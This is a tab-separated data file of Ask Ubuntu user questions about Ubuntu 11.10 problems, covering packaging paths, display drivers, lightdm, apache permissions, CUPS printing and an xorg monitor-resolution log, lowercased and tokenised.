74515	how to package an application that contains a binary that needs to be in $ path ?	i am packaging an application that contains binaries that would normally go in /usr/bin and a shared library that would go in /usr/lib . however , the package guidelines for submitting applications to the software center suggest that binaries should go into /opt . what is the proper way of putting these files into /opt yet making sure they are in the $ path ? for clarification , the page i 'm referring to is here : http : //developer.ubuntu.com/publish/my-apps-packages/ and it states : '' be able to be installed into /opt/ ... . ''
74519	how to remove tearing in videos with nvidia driver ?	i 'm using ubuntu 11.10 as my htpc os on ion board . tearing was always a big problem but this guide ( http : //www.omgubuntu.co.uk/2010/01/how-to-fix-video-tearing-in-videos-nvidia-ubuntu/ ) used to solve it in previous versions . i mean it used to because it does n't solve it anymore . i tried making same changes ( although compiz config is little different and same options are in different panels ) but with no success . i also tried to manually set resolution and refresh rate of hdtv in nvidia settings - no changes at all . i know that open source drivers would solve a problem but it 's not an option because i need vdpau acceleration . i 've also read that completely disabling of composite solves the problem - ca n't do that because compizconfig-settings-manager crashes on attempt . more info about setup : ubuntu 11.10 64bit nvidia ion board newest official version of proprietary driver smplayer with vdpau settings full hd hdtv
74523	how can i install a package without installing some dependencies ?	i 'm trying to install the package latexila , and the output looks like this : $ sudo apt-get install latexila -- no-install-recommends reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : latexila-data latexmk luatex tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base suggested packages : rubber texlive-latex-extra debhelper recommended packages : texlive texlive-latex-recommended texlive-luatex lmodern texlive-latex-base-doc the following new packages will be installed : latexila latexila-data latexmk luatex tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base 0 upgraded , 10 newly installed , 0 to remove and 0 not upgraded . need to get 29.3 mb of archives . after this operation , 74.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? i do n't want to install the texlive packages . i 've installed texlive manually from http : //www.tug.org/texlive/ . any suggestions ?
74526	how to use the sync between computers in software center	am trying to sync between 2 computers with software center but it is confusing . i already logged in in both using the same account but they do not appear to show in the others list . so maybe a step by step guide to how to use this would be helpful .
74528	astrill applet application disappears on minimize	i 'm using the astrill applet for linux on ubuntu 11.10 . up to 11.04 it would work fine and create an icon in the system tray . however in 11.10 astrill 's applet opens just fine however when i minimize it the application simply disappears . there are no icons in the system tray nor in the unity bar . i install tint2 ( task bar ) to see if i can see the application there but no luck . i know the application is running because i can see it when i execute ps -aux ( and also because my traffic is being vpn'ed ) is there a way i can bring the application in the foreground ? i talked to astrill 's tech support , they were n't very helpful , basically they `` think '' that they have customers running their applet on ubuntu 11.10 .
74529	using grep -rin with the string value has underscores	i am trying to run this command . grep -rin `` wp_get_attachment_url '' * but the underscores ( _ ) in the string value seems to mess up the grep command . how do i search the string values that have underscores ?
74533	problem with ubuntu one . sync problem . nothing helps	please help me to solve problem with u1 . worked fine couple days ago . file sync error . ( auth failed ( auth_failed ) ) i have tried some to do some fixes that help with the same problem in 11.04 , but those fixes does not work with 11.10 . update : i solved this problem by changing my laptop name and deleting old name from ubuntu one website .
74534	set nautilus as default file manager in xubuntu	how do i set nautilus to be the default file manager in xubuntu ? should i expect any trouble with this choice compared to normal gnome nautilus setup ?
74537	what does the amd unsupported software message in the right corner mean ?	i know that similar question was already asked but there are no information about how serious is this message . i mean , does it mean that my ati 6750 card was n't really recognized by proprietary driver or it is a bug ? in the ubuntu documentation it is written that this card works from box . so i 'm a bit confused . ps i installed `` amd/ati fglrx proprietary graphic driver '' but i ca n't install `` amd/ati fglrx proprietary graphic driver ( post release updates ) '' . it returns error
74539	how to install services that i did n't install at setup	when i installed ubuntu server v11.0 , i was given a full list of services that i could install , like dns , lamp , print server , etc . i did n't choose any of them , because i wanted to get it over with the installation quickly . is there a way to go back and choose one of these options and have it start its installation process exactly as if i had chosen it with initial install ?
74542	is there a way to rename an external hard drive ?	i 'm using ubuntu 11.10 and i have a couple of wd external drives . the problem is , they all show up in the file manager as `` elements '' which can get confusing . is there a way to rename one or both of them ? right-clicking and going to properties did n't yield any results .
74544	webex and its desktop share feature on 11.10 ?	any experiences with webex and its desktop share feature on ubuntu 11.10 ? on ubuntu 10.10 it works fine with oracle/sun java and sun java plugin . on 11.04 , webex does work , but not the desktop share part . can anyone confirm its behavior on 11.10 ?
74547	how can i disable the sharing of one mouse between several x serverlayouts ?	i run a two-seat setup of ubuntu 11.10 . it is achieved via two serverlayout sections inside of xorg.conf . the movements of the mouse belonging to seat 1 should not be visible on seat 2 , but they are . but no matter which xorg.conf configuration i tried ( and i researched and experimented relentlessly for six hours now ) , i can not prevent this . i placed my hopes into the `` void '' input driver . at various places in the internet it is suggested that /dev/input/mice should be disabled , and one specific mouse device node used instead . i did the following , but no success : section `` inputdevice '' identifier `` dummy '' driver `` void '' option `` device '' `` /dev/input/mice '' option `` corepointer '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` device '' `` /dev/input/mouse0 '' endsection even if i add only inputdevice `` dummy '' into a serverlayout section ( instead of mouse0 ) , the mouse is still functional . i even added option `` corepointer '' to the dummy inputdevice , but still the mouse works . i 've noticed a similar thing with the keyboard . if the driver `` kbd '' is used , the input seems to be shared across several x serverlayouts . if i use `` evdev '' instead , it only is applied to the current serverlayout . i also do n't understand the concept of a `` corepointer '' clearly . is it a mouse pointer that is shared across all server instances ? i feel i 've exhausted all available forum threads and man pages on this .
74549	win7 ca n't be loaded after installing ubuntu 11.10	i use macbookpro8,2 . first of all i installed macos , then win7 on sde4 , then ubuntu on sde5 and swop on sde5 . after installing ubuntu win7 is n't loaded when i choose it in grub . win boot writes the following message : file : \boot\bcd status : 0xc0000225 an error occurred while attempting to load the boot configuration data what shall i do ? try to repair windows using cd ( in this case i think i will damage grub ) or i can somehow configure grub to make it work properly ?
74551	lightdm not starting on boot	i installed gdm for a while as my display manager , and after removing it , lightdm does not start by itself . i instead have to login to a tty , and run sudo start lightdm . running dpkg-reconfigure lightdm does not work either : dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_name missing dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_package missing i 've also tried reinstalling lightdm completely , but it does not work as well my /var/log/boot.log has the following lines : * starting lightdm display manager * starting acpi daemon * starting anac ( h ) ronistic cron * starting save kernel messages * stopping lightdm display manager
74553	how do i manually associate a program to a file type in 11.10 ?	the interface for associating a file type to a particular application has changed in 11.10 due to the introduction of gnome 3 . in previous versions , if i went to file properties , and went to the open with tab , it would be possible to browse /usr/bin for the program i wanted . now , the open with tab only provides a list of applications , and that list is not complete . if the application i want is not on the list , i do n't know how to change the file association . for example , i want .tex files to open with texmaker , not gedit . i get an 'open with texmaker ' option in the right-click menu , but texmaker is not on the list of programs i can permanently associate to the program . i 'd also like to associate .deb files to gdebi-gtk because i do n't like waiting forever for software centre to start .
74554	403 forbidden problem with apache	strange , i have change folder users/groups to www-data ( sudo chown -r www-data : www-data /datos/www ) and also have changed permission to 755 ( sudo chmod -r 755 /datos/www ) , but still getting 403 forbidden problem with apache . tried to find out apache user in the process list and here is the result : bakhtiyor @ sony-vaio : /var/www $ ps aux | grep apache2 root 6627 0.1 0.2 158128 9244 ? ss 23:23 0:00 /usr/sbin/apache2 -k start www-data 6632 0.0 0.1 158152 5348 ? s 23:23 0:00 /usr/sbin/apache2 -k start www-data 6633 0.0 0.1 158152 5348 ? s 23:23 0:00 /usr/sbin/apache2 -k start www-data 6634 0.0 0.1 158152 5348 ? s 23:23 0:00 /usr/sbin/apache2 -k start www-data 6635 0.0 0.1 158152 5348 ? s 23:23 0:00 /usr/sbin/apache2 -k start www-data 6636 0.0 0.1 158152 5348 ? s 23:23 0:00 /usr/sbin/apache2 -k start 1000 6681 0.0 0.0 13468 896 pts/0 s+ 23:23 0:00 grep -- color=auto apache2 apache configuration file for my virtual host is here : < virtualhost indextj:80 > serveradmin webmaster @ indextj documentroot /datos/www < directory / > options followsymlinks allowoverride none < /directory > < directory /datos/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > ... ... < /virtualhost > is it something related to the first process of apache that has been run under root ? even though i do n't know why apache is running under root user . need some ideas about solving this strange issue . thank you
74557	11.10 does not restore open apps in hibernate , works like shutdown	i noticed that my 11.10 does not hibernate . when i hibernate , and starts pc , it does n't restore all my open apps etc . its like a shutdown ... why might that be ? update output from gsettings http : //pastie.org/2926504 using a vanilla ubuntu desktop 11.10 installed yesterday ( no more from alternate cd , but problem still persists ) i dont see any options in bios for s1 , s3 or acpi , are they hidden somewhere ? i am using asus h67 evo , i entered the advanced mode of the bios , i still dont see those stuff ps-*.log files : http : //pastie.org/2922774 grub entry : http : //pastie.org/2922781
74559	is there a way to run ms-dos alongside/within ubuntu ?	is there a version of ms-dos that i can add to ubuntu ? i have old ms-dos games .
74560	how do i install and select cursor themes ?	i 'm new to this amazing os ( ubuntu 11.10 ) and i 've been changing a lot of things and experimenting ( it 's fun you know ) . but i do n't know how to install cursor themes . can i install this ? http : //gnome-look.org/content/show.php/aero+mouse+cursors+with+drop+shadow ? content=67833 if it 's possible , how do you do that ?
74565	how to print both from the command line as well as through cups ?	i have a printer that is being used for two purposes : printing of regular documents ( word , internet pages , etc ) direct printing from the command line ( done by echo `` text '' > /dev/usb/lp0 ) this all worked fine in a previous version of ubuntu . however , recently we upgraded to 11.10 and encountered a problem . first of all , the printers are not added to /dev/usb anymore . so i can not echo to this path , and am unable to achieve printing from the command line . after some hassle , i was able to find a workaround . this workaround was editing /etc/modprobe.d/blacklist-cup-usblp.conf . this file reads : # cups talks to the raw usb devices , so we need to blacklist usblp to avoid # grabbing them blacklist usblp after commenting this blacklisting , the device appears properly in /dev/usb , as lp0 . i had a problem with the permissions of lp0 , but this was solved by the answer from luis felipe barrera mora . however , i now have one major issue to resolve . after i commenting the blacklisting , the printer stopped working when printing from word documents . this is logical , because i disable something that cups needs . so basically i now only have the option to either enable regular cups printing and no command line printing , or i have command line printing and no cups printing . update for completeness : i in fact have two printers connected at the same time . one is used to print both using cups and the command line . the other one - an epson receipt printer - is only used for command line printing . i 've spent many days trying to get it running using cups but this was not possible . however , this means that the lpr command will not solve the problem , because i can not get this second printer to function under cups . i really need to be both able to access /etc/dev/lp0 ( or a similar path ) and print using cups at the same time .
74568	monitor will not be detected , stuck at 640x480	i 'm completely new to linux but know the basics of command entry . here 's what i 've tried : first off , i installed my restricted driver for my geforce 8600 gt . that was the easy part but i got stuck at 1024x768 . i looked at my xorg.0.log and saw that i was using the vesa driver instead of the nv driver . i tried running sudo nvidia-xconfig which made an xorg.conf file , but when i restarted was cut down to 640x480 . in my xorg.0.log i noticed in there that the edid for my monitor was failing . weird . output of x.org.0.log : [ 12.412 ] x.org x server 1.10.4 release date : 2011-08-19 [ 12.412 ] x protocol version 11 , revision 0 [ 12.412 ] build operating system : linux 2.6.24-29-server x86_64 ubuntu [ 12.412 ] current operating system : linux rserver 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 [ 12.412 ] kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-generic root=uuid=6fa39bcf-0be1-45e7-b163-80f5c4d8417e ro quiet splash vt.handoff=7 [ 12.412 ] build date : 19 october 2011 05:21:26am [ 12.412 ] xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) [ 12.412 ] current version of pixman : 0.22.2 [ 12.412 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 12.412 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 12.412 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue nov 1 17:10:16 2011 [ 12.412 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 12.412 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 12.412 ] ( == ) serverlayout `` layout0 '' [ 12.412 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 12.412 ] ( ** ) | | -- > monitor `` monitor0 '' [ 12.413 ] ( ** ) | | -- > device `` device0 '' [ 12.413 ] ( ** ) | -- > input device `` keyboard0 '' [ 12.413 ] ( ** ) | -- > input device `` mouse0 '' [ 12.413 ] ( == ) automatically adding devices [ 12.413 ] ( == ) automatically enabling devices [ 12.413 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 12.413 ] entry deleted from font path . [ 12.413 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 12.413 ] entry deleted from font path . [ 12.413 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 12.413 ] entry deleted from font path . [ 12.413 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 12.413 ] entry deleted from font path . [ 12.413 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 12.413 ] entry deleted from font path . [ 12.413 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 12.413 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 12.413 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 12.413 ] ( ww ) disabling keyboard0 [ 12.413 ] ( ww ) disabling mouse0 [ 12.413 ] ( ii ) loader magic : 0x7e0220 [ 12.413 ] ( ii ) module abi versions : [ 12.413 ] x.org ansi c emulation : 0.4 [ 12.413 ] x.org video driver : 10.0 [ 12.413 ] x.org xinput driver : 12.3 [ 12.413 ] x.org server extension : 5.0 [ 12.414 ] ( -- ) pci : * ( 0:5:0:0 ) 10de:0421:1458:344c rev 161 , mem @ 0xfd000000/16777216 , 0xc0000000/536870912 , 0xfa000000/33554432 , i/o @ 0x0000dc00/128 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 12.414 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 12.414 ] ( ii ) loadmodule : `` extmod '' [ 12.415 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 12.415 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 12.415 ] compiled for 1.10.4 , module version = 1.0.0 [ 12.415 ] module class : x.org server extension [ 12.415 ] abi class : x.org server extension , version 5.0 [ 12.415 ] ( ii ) loading extension mit-screen-saver [ 12.415 ] ( ii ) loading extension xfree86-vidmodeextension [ 12.415 ] ( ii ) loading extension xfree86-dga [ 12.415 ] ( ii ) loading extension dpms [ 12.415 ] ( ii ) loading extension xvideo [ 12.415 ] ( ii ) loading extension xvideo-motioncompensation [ 12.415 ] ( ii ) loading extension x-resource [ 12.415 ] ( ii ) loadmodule : `` dbe '' [ 12.415 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 12.415 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 12.415 ] compiled for 1.10.4 , module version = 1.0.0 [ 12.415 ] module class : x.org server extension [ 12.415 ] abi class : x.org server extension , version 5.0 [ 12.415 ] ( ii ) loading extension double-buffer [ 12.415 ] ( ii ) loadmodule : `` glx '' [ 12.415 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 12.872 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 12.872 ] compiled for 4.0.2 , module version = 1.0.0 [ 12.872 ] module class : x.org server extension [ 12.872 ] ( ii ) nvidia glx module 280.13 wed jul 27 17:12:07 pdt 2011 [ 12.872 ] ( ii ) loading extension glx [ 12.872 ] ( ii ) loadmodule : `` record '' [ 12.872 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 12.872 ] ( ii ) module record : vendor= '' x.org foundation '' [ 12.872 ] compiled for 1.10.4 , module version = 1.13.0 [ 12.872 ] module class : x.org server extension [ 12.872 ] abi class : x.org server extension , version 5.0 [ 12.872 ] ( ii ) loading extension record [ 12.872 ] ( ii ) loadmodule : `` dri '' [ 12.873 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 12.873 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 12.873 ] compiled for 1.10.4 , module version = 1.0.0 [ 12.873 ] abi class : x.org server extension , version 5.0 [ 12.873 ] ( ii ) loading extension xfree86-dri [ 12.873 ] ( ii ) loadmodule : `` dri2 '' [ 12.873 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 12.873 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 12.873 ] compiled for 1.10.4 , module version = 1.2.0 [ 12.873 ] abi class : x.org server extension , version 5.0 [ 12.873 ] ( ii ) loading extension dri2 [ 12.873 ] ( ii ) loadmodule : `` nvidia '' [ 12.873 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 12.874 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 12.874 ] compiled for 4.0.2 , module version = 1.0.0 [ 12.874 ] module class : x.org video driver [ 12.874 ] ( ii ) nvidia dlloader x driver 280.13 wed jul 27 16:55:26 pdt 2011 [ 12.874 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 12.874 ] ( ++ ) using vt number 7 [ 12.874 ] ( ii ) loading sub module `` fb '' [ 12.874 ] ( ii ) loadmodule : `` fb '' [ 12.891 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 12.891 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 12.891 ] compiled for 1.10.4 , module version = 1.0.0 [ 12.891 ] abi class : x.org ansi c emulation , version 0.4 [ 12.891 ] ( ii ) loading sub module `` wfb '' [ 12.891 ] ( ii ) loadmodule : `` wfb '' [ 12.892 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 12.892 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 12.892 ] compiled for 1.10.4 , module version = 1.0.0 [ 12.892 ] abi class : x.org ansi c emulation , version 0.4 [ 12.892 ] ( ii ) loading sub module `` ramdac '' [ 12.892 ] ( ii ) loadmodule : `` ramdac '' [ 12.892 ] ( ii ) module `` ramdac '' already built-in [ 12.892 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 12.892 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 12.892 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 12.892 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 12.892 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 12.892 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 12.892 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 12.892 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 12.892 ] ( ** ) nvidia ( 0 ) : option `` addargbglxvisuals '' `` true '' [ 13.629 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-1 [ 13.632 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce 8500 gt ( g86 ) at pci:5:0:0 ( gpu-0 ) [ 13.632 ] ( -- ) nvidia ( 0 ) : memory : 524288 kbytes [ 13.632 ] ( -- ) nvidia ( 0 ) : videobios : 60.86.34.00.13 [ 13.632 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 13.632 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 13.632 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on geforce 8500 gt at pci:5:0:0 [ 13.632 ] ( -- ) nvidia ( 0 ) : crt-1 [ 13.632 ] ( -- ) nvidia ( 0 ) : crt-1 : 400.0 mhz maximum pixel clock [ 13.661 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid has been [ 13.661 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . [ 13.662 ] ( ii ) nvidia ( 0 ) : assigned display device : crt-1 [ 13.662 ] ( ww ) nvidia ( 0 ) : no valid modes for `` 1360x768 '' ; removing . [ 13.662 ] ( ww ) nvidia ( 0 ) : [ 13.662 ] ( ww ) nvidia ( 0 ) : unable to validate any modes ; falling back to the default mode [ 13.662 ] ( ww ) nvidia ( 0 ) : `` nvidia-auto-select '' . [ 13.662 ] ( ww ) nvidia ( 0 ) : [ 13.662 ] ( ii ) nvidia ( 0 ) : validated modes : [ 13.662 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 13.662 ] ( ** ) nvidia ( 0 ) : virtual screen size configured to be 1360 x 768 [ 13.696 ] ( ww ) nvidia ( 0 ) : unable to get display device crt-1 's edid ; can not compute dpi [ 13.697 ] ( ww ) nvidia ( 0 ) : from crt-1 's edid . [ 13.697 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 13.697 ] ( ** ) nvidia ( 0 ) : enabling 32-bit argb glx visuals . [ 13.697 ] ( -- ) depth 24 pixmap format is 32 bpp [ 13.697 ] ( ii ) nvidia : using 768.00 mb of virtual memory for indirect memory access . [ 13.703 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 13.727 ] ( ii ) loading extension nv-glx [ 13.752 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 13.752 ] ( == ) nvidia ( 0 ) : backing store disabled [ 13.752 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 13.753 ] ( ** ) nvidia ( 0 ) : dpms enabled [ 13.753 ] ( ii ) loading extension nv-control [ 13.753 ] ( ii ) loading extension xinerama [ 13.753 ] ( ii ) loading sub module `` dri2 '' [ 13.753 ] ( ii ) loadmodule : `` dri2 '' [ 13.753 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 13.753 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 13.753 ] compiled for 1.10.4 , module version = 1.2.0 [ 13.753 ] abi class : x.org server extension , version 5.0 [ 13.753 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 13.753 ] ( == ) randr enabled [ 13.753 ] ( ii ) initializing built-in extension generic event extension [ 13.753 ] ( ii ) initializing built-in extension shape [ 13.753 ] ( ii ) initializing built-in extension mit-shm [ 13.753 ] ( ii ) initializing built-in extension xinputextension [ 13.753 ] ( ii ) initializing built-in extension xtest [ 13.753 ] ( ii ) initializing built-in extension big-requests [ 13.753 ] ( ii ) initializing built-in extension sync [ 13.753 ] ( ii ) initializing built-in extension xkeyboard [ 13.753 ] ( ii ) initializing built-in extension xc-misc [ 13.753 ] ( ii ) initializing built-in extension security [ 13.753 ] ( ii ) initializing built-in extension xinerama [ 13.753 ] ( ii ) initializing built-in extension xfixes [ 13.753 ] ( ii ) initializing built-in extension render [ 13.754 ] ( ii ) initializing built-in extension randr [ 13.754 ] ( ii ) initializing built-in extension composite [ 13.754 ] ( ii ) initializing built-in extension damage [ 13.754 ] ( ii ) initializing built-in extension gesture [ 13.755 ] ( ii ) initializing extension glx [ 13.846 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 13.854 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 13.854 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 13.855 ] ( ii ) loadmodule : `` evdev '' [ 13.855 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 13.855 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 13.856 ] compiled for 1.10.2 , module version = 2.6.0 [ 13.856 ] module class : x.org xinput driver [ 13.856 ] abi class : x.org xinput driver , version 12.3 [ 13.856 ] ( ii ) using input driver 'evdev ' for 'power button' [ 13.856 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 13.856 ] ( ** ) power button : always reports core events [ 13.856 ] ( ** ) power button : device : `` /dev/input/event1 '' [ 13.856 ] ( -- ) power button : found keys [ 13.856 ] ( ii ) power button : configuring as keyboard [ 13.856 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 13.856 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 13.856 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 13.856 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 13.856 ] ( ** ) option `` xkb_layout '' `` us '' [ 13.858 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 13.858 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 13.858 ] ( ii ) using input driver 'evdev ' for 'power button' [ 13.858 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 13.858 ] ( ** ) power button : always reports core events [ 13.858 ] ( ** ) power button : device : `` /dev/input/event0 '' [ 13.858 ] ( -- ) power button : found keys [ 13.858 ] ( ii ) power button : configuring as keyboard [ 13.858 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 13.858 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 13.858 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 13.858 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 13.858 ] ( ** ) option `` xkb_layout '' `` us '' [ 13.860 ] ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/event3 ) [ 13.860 ] ( ** ) usb optical mouse : applying inputclass `` evdev pointer catchall '' [ 13.860 ] ( ii ) using input driver 'evdev ' for 'usb optical mouse' [ 13.860 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 13.860 ] ( ** ) usb optical mouse : always reports core events [ 13.860 ] ( ** ) usb optical mouse : device : `` /dev/input/event3 '' [ 13.860 ] ( -- ) usb optical mouse : found 3 mouse buttons [ 13.860 ] ( -- ) usb optical mouse : found scroll wheel ( s ) [ 13.860 ] ( -- ) usb optical mouse : found relative axes [ 13.860 ] ( -- ) usb optical mouse : found x and y relative axes [ 13.860 ] ( ii ) usb optical mouse : configuring as mouse [ 13.860 ] ( ii ) usb optical mouse : adding scrollwheel support [ 13.860 ] ( ** ) usb optical mouse : yaxismapping : buttons 4 and 5 [ 13.860 ] ( ** ) usb optical mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 13.860 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.0/usb3/3-2/3-2:1.0/input/input3/event3 '' [ 13.860 ] ( ii ) xinput : adding extended input device `` usb optical mouse '' ( type : mouse ) [ 13.860 ] ( ii ) usb optical mouse : initialized for relative axes . [ 13.860 ] ( ** ) usb optical mouse : ( accel ) keeping acceleration scheme 1 [ 13.860 ] ( ** ) usb optical mouse : ( accel ) acceleration profile 0 [ 13.860 ] ( ** ) usb optical mouse : ( accel ) acceleration factor : 2.000 [ 13.860 ] ( ** ) usb optical mouse : ( accel ) acceleration threshold : 4 [ 13.861 ] ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/mouse0 ) [ 13.861 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 13.862 ] ( ii ) config/udev : adding input device hda intel headphone ( /dev/input/event4 ) [ 13.862 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 13.869 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event2 ) [ 13.869 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 13.869 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 13.869 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 13.869 ] ( ** ) at translated set 2 keyboard : always reports core events [ 13.869 ] ( ** ) at translated set 2 keyboard : device : `` /dev/input/event2 '' [ 13.869 ] ( -- ) at translated set 2 keyboard : found keys [ 13.869 ] ( ii ) at translated set 2 keyboard : configuring as keyboard [ 13.869 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input2/event2 '' [ 13.869 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard ) [ 13.869 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 13.869 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 13.869 ] ( ** ) option `` xkb_layout '' `` us '' [ 17.242 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-a77bbe312a49c9fe89948d38b2a8cb84c3cbb410.xkm my xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 280.13 ( buildmeister @ swio-display-x86-rhel47-03.nvidia.com ) wed jul 27 17:15:58 pdt 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` addargbglxvisuals '' `` true '' option `` nologo '' `` true '' subsection `` display '' depth 24 endsubsection endsection and if i try using xrandr in the customary fashion ( just to get back to 1024x768 ) , i get : xrandr -- 